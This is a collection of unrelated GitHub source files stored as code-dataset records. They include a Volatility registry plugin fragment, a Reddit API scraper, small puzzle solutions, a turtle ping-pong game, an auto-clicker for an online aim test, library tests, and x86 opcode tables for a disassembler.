outfd.write(\"Last updated: {0}\\n\".format(key.LastWriteTime))\r\n                outfd.write(\"\\n\")\r\n                outfd.write(\"Subkeys:\\n\")\r\n                for s in rawreg.subkeys(key):\r\n                    key_info = {}\r\n                    if s.Name == None:\r\n                        outfd.write(\"  Unknown subkey: \" + s.Name.reason + \"\\n\")\r\n                    else:\r\n                        key_info['Name'] = s.Name\r\n                        key_info['LastUpdated'] = s.LastWriteTime\r\n                        for v in rawreg.values(s):\r\n                            if v.Name not in print_values.values():\r\n                                continue\r\n                            tp, dat = rawreg.value_data(v)\r\n                            if tp == 'REG_BINARY' or tp == 'REG_NONE':\r\n                                dat = \"\\n\" + \"\\n\".join([\"{0:#010x} {1:<48} {2}\".format(o, h, ''.join(c)) for o, h, c in utils.Hexdump(dat)])\r\n                            if tp in ['REG_SZ', 'REG_EXPAND_SZ', 'REG_LINK']:\r\n                                dat = dat.encode(\"ascii\", 'backslashreplace')\r\n                            if tp == 'REG_MULTI_SZ':\r\n                                for i in range(len(dat)):\r\n                                    dat[i] = dat[i].encode(\"ascii\", 'backslashreplace')\r\n                            key_info[str(v.Name)] = dat\r\n                        outfd.write(\"Subkey: {0}\\n\".format(key_info.get('Name','')))\r\n                        outfd.write(\" LastUpdated : {0}\\n\".format(key_info.get('LastUpdated','')))\r\n                        for k, v in sorted(print_values.items()):\r\n                            val = key_info.get(v, '')\r\n                            if val != '':\r\n                                outfd.write(\" {0:16}: {1}\\n\".format(v, val))\r\n                        
outfd.write(\"\\n\")\n","repo_name":"volatilityfoundation/community","sub_path":"DaveLasalle/uninstallinfo.py","file_name":"uninstallinfo.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"37"}
{"seq_id":"6887985389","text":"#!/usr/bin/python3\n\"\"\"\nThis module contains a single function for checking all subreddit posts' titles\nFunction: recurse(subreddit)\n\"\"\"\nimport requests\n\n\ndef recurse(subreddit):\n    \"\"\"This function gets all hot post titles and returns them as a list\n    Arg:\n        -subreddit\n    \"\"\"\n    url = \"https://www.reddit.com/r/{}/hot.json?limit=100\".format(subreddit)\n    header = {'User-agent': 'Chrome'}\n    h_list = []\n\n    response = requests.get(url, headers=header, allow_redirects=False)\n\n    if response.status_code >= 300:\n        return None\n\n    return paginate(subreddit, url, None, header, h_list)\n\n\ndef paginate(subreddit, url, after, header, hot_list):\n    \"\"\"This function paginates through the results to collect each post's title\n    Args:\n        -subreddit: The subreddit\n        -url: The url of the endpoint\n        -header: The complementary request header\n        -hot_list: The list of hot posts\n    \"\"\"\n    params = {'after': after}\n    response = requests.get(url, headers=header,\n                            params=params,\n                            allow_redirects=False)\n    next_page = response.json().get(\"data\").get(\"after\")\n    posts = response.json().get(\"data\").get(\"children\")\n    for post in posts:\n        title = post.get(\"data\").get(\"title\")\n        # print(title)\n        hot_list.append(title)\n    if next_page:\n        return paginate(subreddit, url, next_page, header, hot_list)\n    return hot_list\n","repo_name":"iamprosper/alx-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"42088628582","text":"n, k = map(int, input().split())\ncoin_type = [int(input()) for _ in range(n)]\ncoin_type.sort(reverse=True)\n\nresult = 0\nfor coin in coin_type:\n    if coin <= k:\n        result += k // coin\n        k %= coin\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코딩테스트 대비 문제집 with Baekjoon/그리디/solution9.py","file_name":"solution9.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"74283991146","text":"from PyQt5.QtWidgets import QLabel, QVBoxLayout, QHBoxLayout\n\n\nclass FormationLayout(QVBoxLayout):\n    '''\n    Collaborates with Formation, which recurses.\n    '''\n\n\n    def __init__(self, formation, top):\n        super(FormationLayout, self).__init__()\n        \n        if formation.isSingleValued():\n            self._singleChildLayout(formation)\n        else:\n            self._multipleChildLayout(formation, top)\n        \n        \n    def _multipleChildLayout(self, formation, top):\n        '''\n        A tree-like, indented layout/widget.\n        \n        \n        name\n        ------\n        | (recursion)\n        |\n        '''\n        \n        if not top:\n            # display formation name in the layout\n            label = QLabel(formation.role + formation.name)\n            self.addWidget(label)\n        # else display name in window title\n        \n        \n        indentedLayout = QHBoxLayout()\n        indentedLayout.addSpacing(20) # Apparently pixels\n        \n        # Create lower right quadrant via recursion\n        vLayout = QVBoxLayout()\n        formation.displayContentsInLayout(vLayout)\n        \n        indentedLayout.addLayout(vLayout)\n        \n        self.addLayout(indentedLayout)\n        \n        \n    def _singleChildLayout(self, formation):\n        '''\n        Single row layout.\n        \n        name Label 
| value\n '''\n formation.displayContentsInLayout(self) \n ","repo_name":"bootchk/documentStyle","sub_path":"documentStyle/ui/layout/formationLayout.py","file_name":"formationLayout.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17644717039","text":"import cv2\nimport os\nimport numpy as np\nimport random\n\n\ndef sp_noise(image, prob):\n output = np.zeros(image.shape, np.uint8)\n threshold = 1 - prob\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n rdn = random.random()\n if rdn < prob:\n output[i][j] = 0\n elif rdn > threshold:\n output[i][j] = 255\n else:\n output[i][j] = image[i][j]\n return output\n\n\ndef main():\n for folder in os.listdir(\"../stanford-car-dataset-by-classes-folder/car_data/car_data/train\")[8:]:\n folder = os.path.join(\"../stanford-car-dataset-by-classes-folder/car_data/car_data/train\", folder)\n for file in os.listdir(folder):\n original_image = cv2.imread(os.path.join(folder, file))\n blur = cv2.blur(original_image, (3, 3))\n noise_img = sp_noise(original_image, 0.02)\n flip_horizontal = cv2.flip(original_image, 1)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_blur_3.jpg\", blur)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_S&P_noise.jpg\", noise_img)\n cv2.imwrite(os.path.splitext(os.path.join(folder, file))[0] + \"_h_flip.jpg\", flip_horizontal)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alex-stoica/Pytorch-Lite","sub_path":"loaders/enhance_dataset.py","file_name":"enhance_dataset.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040805924","text":"from typing import Mapping, Optional, Type\n\nimport numpy as np\nimport pytest\n\nfrom starfish import Log\nfrom starfish.image import Filter\nfrom starfish.types import ArrayLike, Axes, Coordinates, Number\nfrom ..label_image import AttrKeys, CURRENT_VERSION, DOCTYPE_STRING, LabelImage\n\n\n@pytest.mark.parametrize(\n \"array, physical_ticks, log, expected_error\",\n [\n # 3D label image\n [\n np.zeros((1, 1, 1), dtype=np.int32),\n {\n Coordinates.X: [0],\n Coordinates.Y: [0],\n Coordinates.Z: [0],\n },\n None,\n None,\n ],\n # 2D label image\n [\n np.zeros((1, 2), dtype=np.int32),\n {\n Coordinates.X: [0, 1],\n Coordinates.Y: [0],\n },\n None,\n None,\n ],\n # wrong dtype\n [\n np.zeros((1, 2), dtype=np.float32),\n {\n Coordinates.X: [0, 1],\n Coordinates.Y: [0],\n },\n None,\n TypeError,\n ],\n # missing some coordinates\n [\n np.zeros((1, 2), dtype=np.float32),\n {\n Coordinates.X: [0, 1],\n },\n None,\n KeyError,\n ],\n ]\n)\ndef test_from_array_and_coords(\n array: np.ndarray,\n physical_ticks: Mapping[Coordinates, ArrayLike[Number]],\n log: Optional[Log],\n expected_error: Optional[Type[Exception]],\n):\n \"\"\"Test that we can construct a LabelImage and that some common error conditions are caught.\"\"\"\n if expected_error is not None:\n with pytest.raises(expected_error):\n LabelImage.from_label_array_and_ticks(array, None, physical_ticks, log)\n else:\n label_image = LabelImage.from_label_array_and_ticks(array, None, physical_ticks, log)\n assert isinstance(label_image.log, Log)\n assert label_image.xarray.attrs.get(AttrKeys.DOCTYPE, None) == DOCTYPE_STRING\n assert label_image.xarray.attrs.get(AttrKeys.VERSION, None) == str(CURRENT_VERSION)\n\n\ndef test_pixel_coordinates():\n \"\"\"Test that the code creates 
missing pixel coordinate values.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X: [2, 3, 4, 5],\n Axes.ZPLANE: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X: [0, 0.5, 1.0, 1.5],\n Coordinates.Y: [0, 0.2, 0.4],\n Coordinates.Z: [0, 0.1],\n }\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, None)\n\n assert np.array_equal(label_image.xarray.coords[Axes.X.value], [2, 3, 4, 5])\n # not provided, should be 0..N-1\n assert np.array_equal(label_image.xarray.coords[Axes.Y.value], [0, 1, 2])\n assert np.array_equal(label_image.xarray.coords[Axes.ZPLANE.value], [0, 1])\n\n\ndef test_coordinates_key_type():\n \"\"\"Test that the code correctly handles situations where the coordinate keys are provided as\n strings instead of the enumerated types.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X.value: [2, 3, 4, 5],\n Axes.Y.value: [0, 1, 2],\n Axes.ZPLANE.value: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X.value: [0, 0.5, 1.0, 1.5],\n Coordinates.Y.value: [0, 0.2, 0.4],\n Coordinates.Z.value: [0, 0.1],\n }\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, None)\n\n for axis_str, axis_data in pixel_coordinates.items():\n assert np.array_equal(label_image.xarray.coords[axis_str], axis_data)\n for coord_str, coord_data in physical_coordinates.items():\n assert np.array_equal(label_image.xarray.coords[coord_str], coord_data)\n\n\ndef test_save_and_load(tmp_path):\n \"\"\"Verify that we can save the label image and load it correctly.\"\"\"\n array = np.zeros((2, 3, 4), dtype=np.int32)\n pixel_coordinates = {\n Axes.X: [2, 3, 4, 5],\n Axes.ZPLANE: [0, 1],\n }\n physical_coordinates = {\n Coordinates.X: [0, 0.5, 1.0, 1.5],\n Coordinates.Y: [0, 0.2, 0.4],\n Coordinates.Z: [0, 0.1],\n }\n log = Log()\n # instantiate a filter (even though that makes no sense in this context)\n filt = Filter.Reduce((Axes.ROUND,), func=\"max\")\n log.update_log(filt)\n\n label_image = LabelImage.from_label_array_and_ticks(\n array, pixel_coordinates, physical_coordinates, log)\n label_image.to_netcdf(tmp_path / \"label_image.netcdf\")\n\n loaded_label_image = LabelImage.open_netcdf(tmp_path / \"label_image.netcdf\")\n\n assert label_image.xarray.equals(loaded_label_image.xarray)\n assert label_image.xarray.attrs == loaded_label_image.xarray.attrs\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/morphology/label_image/test/test_label_image.py","file_name":"test_label_image.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"2634524946","text":"import webbrowser\r\nimport time\r\nfrom pynput.keyboard import Key,Controller\r\nimport urllib\r\nimport re\r\nimport keyboard\r\n\r\nurls = 'https://humanbenchmark.com/tests/aim'\r\nfor b in range(0,10,1):\r\n\twebbrowser.open(urls,new=0)\r\n\ttime.sleep(3)\r\n\tfrom pynput.mouse import Button,Controller\r\n\tmouse=Controller()\r\n\tmouse.position=(950,417)\r\n\tmouse.click(Button.left)\r\n\ttime.sleep(1)\r\n\tmouse.position=(440,251)\r\n\tx=440\r\n\ty=251\r\n\tfor a in range(0,30,1):\r\n\t\tfor y in range(251,555,25):\r\n\t\t\tfor x in range(440,1361,25):\r\n\t\t\t\tmouse.position = (x,y)\r\n\t\t\t\tmouse.click(Button.left)\r\n\t\t\t\tif keyboard.is_pressed('q'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse: 
\r\n\t\t\t\t\tpass\r\n\r\n\r\n\r\nmouse.position=(1361,555)","repo_name":"almin14/python","sub_path":"python/New Text Document.py","file_name":"New Text Document.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4246214399","text":"import math\n\n\ndef int_to_snafu(char):\n if char == 2:\n return \"2\"\n elif char == 1:\n return \"1\"\n elif char == 0:\n return \"0\"\n elif char == -1:\n return \"-\"\n elif char == -2:\n return \"=\"\n else:\n raise ValueError(char)\n\n\ndef SNAFU_to_decimal(SNAFU_val):\n snafu_list = list(reversed(list(SNAFU_val)))\n vals_to_sum = []\n for i in range(0, len(snafu_list)):\n if snafu_list[i] == \"=\":\n val = -2\n elif snafu_list[i] == \"-\":\n val = -1\n else:\n val = int(snafu_list[i])\n vals_to_sum.append(math.pow(5, i) * val)\n\n return sum(vals_to_sum)\n\n\ndef to_base_5(n):\n s = \"\"\n while n:\n s = str(n % 5) + s\n n //= 5\n return s\n\n\ndef decimal_to_SNAFU(val):\n normal_base5 = to_base_5(val)\n if not (\"3\" in normal_base5 or \"4\" in normal_base5):\n return normal_base5\n else:\n contains_bad_chars = True\n normal_base_list = [int(c) for c in list(normal_base5)]\n while contains_bad_chars:\n if len(normal_base_list) > 1:\n stop = len(normal_base_list) - 1\n else:\n stop = len(normal_base_list)\n for i in range(0, stop):\n if i == 0:\n if normal_base_list[i] > 2:\n normal_base_list.insert(0, 1)\n normal_base_list[i + 1] -= 5\n break\n if normal_base_list[i + 1] == 3:\n normal_base_list[i] += 1\n normal_base_list[i + 1] = -2\n if normal_base_list[i + 1] == 4:\n normal_base_list[i] += 1\n normal_base_list[i + 1] = -1\n contains_bad_chars = (3 in normal_base_list) or (4 in normal_base_list)\n\n final_val = \"\".join([int_to_snafu(v) for v in normal_base_list])\n print(final_val)\n return final_val\n\n # # increment biggest val\n # if normal_base5[0] == \"2\":\n # new_base_5 = \"1\" + \"0\" * len(normal_base5)\n # elif normal_base5[0] == \"1\":\n # new_base_5 = \"2\" + \"0\" * (len(normal_base5) - 1)\n # elif (normal_base5[0]) == \"0\":\n # new_base_5 = \"1\" + \"0\" * (len(normal_base5) - 1)\n\n # # take diff to required val\n # nn = to_base_5(int(SNAFU_to_decimal(new_base_5)) - int(val))\n # # if it is already now compatible base 5 we take it away char by char and return\n # if not (\"3\" in nn or \"4\" in nn):\n # snafu_list = list(reversed(list(nn)))\n # new_base_5_reversed = list(reversed(list(new_base_5)))\n # for i in range(0, len(snafu_list)):\n # new_val = int(new_base_5_reversed[i]) - int(snafu_list[i])\n # new_char = int_to_snafu(new_val)\n # new_base_5_reversed[i] = new_char\n\n # new_base_5_reversed.reverse()\n # return \"\".join(new_base_5_reversed)\n # else:\n # pass\n\n\nif __name__ == \"__main__\":\n with open(\n \"/Users/TimothyW/Fun/avent_of_code/2022/day_twenty_five/input.txt\", \"r\"\n ) as f:\n test_input = list(map(lambda x: x.strip(\"\\n\").strip(), f.readlines()))\n\n total = sum(list(map(lambda x: SNAFU_to_decimal(x), test_input)))\n\n print(total)\n\n r = decimal_to_SNAFU(int(total))\n print(r)\n","repo_name":"Williams224/advent_of_code","sub_path":"2022/day_twenty_five/day_twenty_five.py","file_name":"day_twenty_five.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38807767390","text":"#import turtle module\n\nimport turtle\n\nwind = turtle.Screen()\nwind.title(\"Ping Pong 
Game\")\nwind.bgcolor(\"black\")\nwind.setup(width=800, height=600)\n\nwind.tracer(0) # stop update the screen\n\n\n#player 1\nplayer1 = turtle.Turtle()\nplayer1.speed(0)\nplayer1.shape(\"square\")\nplayer1.color(\"blue\")\nplayer1.shapesize(stretch_wid=5, stretch_len=1)\nplayer1.penup()\nplayer1.goto(-350, 0)\n\n#player 2\nplayer2 = turtle.Turtle()\nplayer2.speed(0)\nplayer2.shape(\"square\")\nplayer2.color(\"red\")\nplayer2.shapesize(stretch_wid=5, stretch_len=1)\nplayer2.penup()\nplayer2.goto(350, 0)\n\n#ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"square\")\nball.color(\"white\")\nball.penup()\nball.goto(0, 0)\nball.dx = 2.5\nball.dy = 2.5\n\n#score\nscore1 = 0\nscore2 = 0\nscore = turtle.Turtle()\nscore.speed(0)\nscore.color('white')\nscore.penup()\nscore.hideturtle()\nscore.goto(0, 260)\nscore.write(\"player 1: 0, Player 2: 0\", align='center', font=('Courier', 24, 'normal'))\n\n#functions\ndef player1_move_up():\n y = player1.ycor()\n y += 20\n player1.sety(y)\n\ndef player1_move_down():\n y = player1.ycor()\n y -= 20\n player1.sety(y)\n\ndef player2_move_up():\n y = player2.ycor()\n y += 20\n player2.sety(y)\n\ndef player2_move_down():\n y = player2.ycor()\n y -= 20\n player2.sety(y)\n\n#keybord bindings\nwind.listen()\nwind.onkeypress(player1_move_up, 'w')\nwind.onkeypress(player1_move_down, 's')\nwind.onkeypress(player2_move_up, 'Up')\nwind.onkeypress(player2_move_down, 'Down')\n\nwhile True:\n wind.update()\n\n # move the ball\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n #border check\n if ball.ycor() > 290:\n ball.sety(290)\n ball.dy *= -1\n\n if ball.ycor() < -290:\n ball.sety(-290)\n ball.dy *= -1\n\n if ball.xcor() > 390:\n ball.goto(0, 0)\n ball.dx *= -1\n score1 += 1\n score.clear()\n score.write(\"player 1: {}, Player 2: {}\".format(score1, score2), align='center', font=('Courier', 24, 'normal'))\n\n if ball.xcor() < -390:\n ball.goto(0, 0)\n ball.dx *= -1\n score2 += 1\n score.clear()\n score.write(\"player 1: {}, Player 2: {}\".format(score1, score2), align='center', font=('Courier', 24, 'normal'))\n\n # if ball touches padlle\n if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < player2.ycor() + 40 and ball.ycor() > player2.ycor() - 40) :\n ball.setx(340)\n ball.dx *= -1\n\n if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < player1.ycor() + 40 and ball.ycor() > player1.ycor() - 40) :\n ball.setx(-340)\n ball.dx *= -1\n","repo_name":"mohamedahmedaa22/python-ping-pong-game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959683308","text":"import sys\nsys.setrecursionlimit(10**4)\n\n# 하 좌 상 우\ndx = [1, 0, -1, 0]\ndy = [0, -1, 0, 1]\n\n\ndef dfs(x, y):\n global ch_matrix, matrix\n ch_matrix[x][y] = 1\n cnt = 1\n\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < M and matrix[nx][ny] == '#' and ch_matrix[nx][ny] == 0:\n ch_matrix[nx][ny] = 1\n cnt += dfs(nx, ny)\n return cnt\n\n\nN, M, K = map(int, input().split())\ngarbage = [tuple(map(int, input().split())) for _ in range(K)]\nmatrix = []\nfor _ in range(N):\n matrix.append(['.' 
for _ in range(M)])\nfor x, y in garbage:\n matrix[x-1][y-1] = '#'\nlargest = 0\nch_matrix = []\nfor _ in range(N):\n ch_matrix.append([0 for _ in range(M)])\n\nfor x in range(N):\n for y in range(M):\n if matrix[x][y] == '#' and ch_matrix[x][y] == 0:\n ch_matrix[x][y] = 1\n largest = max(largest, dfs(x, y))\n\nprint(largest)","repo_name":"bansakdo/Algorithm","sub_path":"BOJ/DFS/Q1743.py","file_name":"Q1743.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39426851998","text":"# coding: utf-8\nfrom __future__ import with_statement\nfrom tornado.ioloop import IOLoop\nfrom tornado import testing\nfrom mongotor.connection import Connection\nfrom mongotor.errors import InterfaceError, DatabaseError, IntegrityError\nfrom bson import ObjectId\nfrom mongotor import message\nfrom mongotor import helpers\n\nimport sure\nimport fudge\n\n\nclass ConnectionTestCase(testing.AsyncTestCase):\n\n def get_new_ioloop(self):\n return IOLoop.instance()\n\n def setUp(self):\n super(ConnectionTestCase, self).setUp()\n self.conn = Connection(host=\"localhost\", port=27027)\n\n def tearDown(self):\n super(ConnectionTestCase, self).tearDown()\n self.conn.close()\n\n def test_not_connect_to_mongo_raises_error(self):\n \"\"\"[ConnectionTestCase] - Raises error when can't connect to mongo\"\"\"\n\n Connection.when.called_with(host=\"localhost\", port=27000) \\\n .should.throw(InterfaceError, \"Connection refused\")\n\n def test_connect_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Can stabilish connection to mongo\"\"\"\n\n self.conn._connected.should.be.ok\n\n def test_send_test_message_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Send message to test driver connection\"\"\"\n\n object_id = ObjectId()\n message_test = message.query(0, 'mongotor_test.$cmd', 0, 1,\n {'driverOIDTest': object_id})\n\n self.conn.send_message_with_response(message_test, callback=self.stop)\n response, _ = self.wait()\n\n response = helpers._unpack_response(response)\n result = response['data'][0]\n\n result['oid'].should.be(object_id)\n result['ok'].should.be(1.0)\n result['str'].should.be(str(object_id))\n\n def test_close_connection_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Can close connection to mongo\"\"\"\n\n self.conn.close()\n\n self.conn._connected.should_not.be.ok\n self.conn._stream.closed().should.be.ok\n\n def test_return_integrity_error_when_mongo_return_err(self):\n \"\"\"[ConnectionTestCase] - Returns IntegrityError when mongo return a message with err\"\"\"\n\n object_id = ObjectId()\n message_insert = message.insert('mongotor_test.articles', [{'_id': object_id}],\n False, True, {})\n\n self.conn.send_message(message_insert, True, callback=self.stop)\n self.wait()\n\n self.conn.send_message(message_insert, True, callback=self.stop)\n self.wait.when.called_with().throw(IntegrityError)\n\n @fudge.patch('mongotor.connection.helpers')\n def test_raises_error_when_cant_unpack_response(self, fake_helpers):\n \"\"\"[ConnectionTestCase] - Returns DatabaseError when can't unpack response from mongo\"\"\"\n\n fake_helpers.provides('_unpack_response') \\\n .raises(DatabaseError('database error'))\n\n object_id = ObjectId()\n message_test = message.query(0, 'mongotor_test.$cmd', 0, 1,\n {'driverOIDTest': object_id})\n\n self.conn.send_message(message_test, with_last_error=True, callback=self.stop)\n\n self.wait.when.called_with().throw(DatabaseError, 'database error')\n\n def 
test_reconnect_when_connection_was_lost(self):\n \"\"\"[ConnectionTestCase] - Reconnect to mongo when connection was lost\"\"\"\n\n self.conn.close()\n self.conn._callback = self.stop\n self.wait()\n\n self.test_send_test_message_to_mongo()\n\n def test_raises_interface_error_when_cant_reconnect(self):\n \"\"\"[ConnectionTestCase] - Raises InterfaceError when connection was lost and autoreconnect is False\"\"\"\n\n self.conn = Connection(host=\"localhost\", port=27027, autoreconnect=False)\n\n self.conn.close()\n\n self.conn.send_message.when.called_with('shouldBeMessage',\n callback=None).should.throw(InterfaceError, \"connection is closed\")\n\n def test_raises_error_when_stream_reaise_ioerror(self):\n \"\"\"[ConnectionTestCase] - Raises IOError when stream throw error\"\"\"\n fake_stream = fudge.Fake()\n fake_stream.expects('write').raises(IOError())\n\n with fudge.patched_context(self.conn, '_stream', fake_stream):\n\n self.conn.send_message.when.called_with((0, ''), callback=None) \\\n .throw(IOError)\n","repo_name":"marcelnicolay/mongotor","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"3266930564","text":"\n# The opcode tables were taken from Mammon_'s Guide to Writing Disassemblers in Perl, You Morons!\"\n# and the bastard project. http://www.eccentrix.com/members/mammon/\n\nINSTR_PREFIX = 0xF0000000\nADDRMETH_MASK = 0x00FF0000\nADDRMETH_A = 0x00010000 # Direct address with segment prefix\nADDRMETH_B = 0x00020000 # VEX.vvvv field selects general purpose register\nADDRMETH_C = 0x00030000 # MODRM reg field defines control register\nADDRMETH_D = 0x00040000 # MODRM reg field defines debug register\nADDRMETH_E = 0x00050000 # MODRM byte defines reg/memory address\nADDRMETH_F = 0x00060000 # EFLAGS/RFLAGS register\nADDRMETH_G = 0x00070000 # MODRM byte defines general-purpose reg\nADDRMETH_H = 0x00080000 # VEX.vvvv field selects 128bit XMM or 256bit YMM register\nADDRMETH_I = 0x00090000 # Immediate data follows\nADDRMETH_J = 0x000A0000 # Immediate value is relative to EIP\nADDRMETH_L = 0x000B0000\nADDRMETH_M = 0x000C0000 # MODRM mod field can refer only to memory\nADDRMETH_N = 0x000D0000 # R/M field of MODRM selects a packed-quadword, MMX register\nADDRMETH_O = 0x000E0000 # Displacement follows (without modrm/sib)\nADDRMETH_P = 0x000F0000 # MODRM reg field defines MMX register\nADDRMETH_Q = 0x00100000 # MODRM defines MMX register or memory\nADDRMETH_R = 0x00110000 # MODRM mod field can only refer to register\nADDRMETH_S = 0x00120000 # MODRM reg field defines segment register\nADDRMETH_U = 0x00130000 # MODRM reg field defines test register\nADDRMETH_V = 0x00140000 # MODRM reg field defines XMM register\nADDRMETH_W = 0x00150000 # MODRM defines XMM register or memory\nADDRMETH_X = 0x00160000 # Memory addressed by DS:rSI\nADDRMETH_Y = 0x00170000 # Memory addressd by ES:rDI\nADDRMETH_LAST = ADDRMETH_Y\n\nOPTYPE_a = 0x01000000 # 2/4 two one-word operands in memory or two double-word operands in memory (operand-size attribute) \nOPTYPE_b = 0x02000000 # 1 always 1 byte\nOPTYPE_c = 0x03000000 # 1/2 byte or word, depending on operand\nOPTYPE_d = 0x04000000 # 4 double-word\nOPTYPE_ds = 0x04000000 # 4 double-word\nOPTYPE_dq = 0x05000000 # 16 double quad-word\nOPTYPE_p = 0x06000000 # 4/6 32-bit or 48-bit pointer\nOPTYPE_pi = 0x07000000 # 8 quadword MMX register\nOPTYPE_ps = 0x08000000 # 16 128-bit single-precision float\nOPTYPE_pd 
= 0x08000000 # ?? should be a double-precision float?\nOPTYPE_q = 0x09000000 # 8 quad-word\nOPTYPE_qp = 0x09000000 # 8 quad-word\nOPTYPE_qq = 0x0A000000 # 8 quad-word\nOPTYPE_s = 0x0B000000 # 6 6-byte pseudo descriptor\nOPTYPE_ss = 0x0C000000 # ?? Scalar of 128-bit single-precision float\nOPTYPE_si = 0x0D000000 # 4 Doubleword integer register\nOPTYPE_sd = 0x0E000000 # ??? \nOPTYPE_v = 0x0F000000 # 2/4 word or double-word, depending on operand\nOPTYPE_w = 0x10000000 # 2 always word\nOPTYPE_x = 0x11000000 # 2 always word\nOPTYPE_y = 0x12000000 # 4/8 dword or qword\nOPTYPE_z = 0x13000000 # 2/4 is this OPTYPE_z? word for 16-bit operand size or doubleword for 32 or 64-bit operand-size\n\nOPTYPE_fs = 0x14000000 # \nOPTYPE_fd = 0x15000000 # \nOPTYPE_fe = 0x16000000 # \nOPTYPE_fb = 0x17000000 # \nOPTYPE_fv = 0x18000000 # \n\n# FIXME this should probably be a list rather than a dictionary\n\nOPERSIZE = {\n 0 : (2,4,8), # We will only end up here on regs embedded in opcodes\n OPTYPE_a : (2,4,4),\n OPTYPE_b : (1,1,1),\n OPTYPE_c : (1,2,2), # 1/2 byte or word, depending on operand\n OPTYPE_d : (4,4,4), # 4 double-word\n OPTYPE_dq: (16,16,16), # 16 double quad-word\n OPTYPE_p : (4,6,6), # 4/6 32-bit or 48-bit pointer\n OPTYPE_pi: (8,8,8), # 8 quadword MMX register\n OPTYPE_ps: (16,16,16), # 16 128-bit single-precision float\n OPTYPE_pd: (16,16,16), # ?? should be a double-precision float?\n OPTYPE_q : (8,8,8), # 8 quad-word\n OPTYPE_qq: (32,32,32), # 32 quad-quad-word\n OPTYPE_s : (6,10,10), # 6 6-byte pseudo descriptor\n OPTYPE_ss: (16,16,16), # ?? Scalar of 128-bit single-precision float\n OPTYPE_si: (4,4,4), # 4 Doubleword integer register\n OPTYPE_sd: (16,16,16), # ??? Scalar of 128-bit double-precision float\n OPTYPE_v : (2,4,8), # 2/4 word or double-word, depending on operand\n OPTYPE_w : (2,2,2), # 2 always word\n OPTYPE_x : (16,16,32), # 16/32 double-quadword or quad-quadword\n OPTYPE_y : (4,4,8), # 4/8 dword or qword in 64-bit mode\n OPTYPE_z : (2,4,4), # word for 16-bit operand size or doubleword for 32 or 64-bit operand-size\n # Floating point crazyness FIXME these are mostly wrong\n OPTYPE_fs: (4,4,4),\n OPTYPE_fd: (8,8,8),\n OPTYPE_fe: (10,10,10),\n OPTYPE_fb: (10,10,10),\n OPTYPE_fv: (14,14,28),\n}\n\n\nINS_EXEC = 0x1000\nINS_ARITH= 0x2000\nINS_LOGIC= 0x3000\nINS_STACK= 0x4000\nINS_COND = 0x5000\nINS_LOAD = 0x6000\nINS_ARRAY= 0x7000\nINS_BIT = 0x8000\nINS_FLAG = 0x9000\nINS_FPU = 0xA000\nINS_TRAPS= 0xD000\nINS_SYSTEM = 0xE000\nINS_OTHER= 0xF000\n\nINS_BRANCH = INS_EXEC | 0x01 \nINS_BRANCHCC= INS_EXEC | 0x02 \nINS_CALL = INS_EXEC | 0x03\nINS_CALLCC = INS_EXEC | 0x04 \nINS_RET = INS_EXEC | 0x05 \nINS_LOOP = INS_EXEC | 0x06 \n \nINS_ADD= INS_ARITH | 0x01\nINS_SUB= INS_ARITH | 0x02\nINS_MUL= INS_ARITH | 0x03\nINS_DIV= INS_ARITH | 0x04\nINS_INC= INS_ARITH | 0x05 \nINS_DEC= INS_ARITH | 0x06 \nINS_SHL= INS_ARITH | 0x07 \nINS_SHR= INS_ARITH | 0x08\nINS_ROL= INS_ARITH | 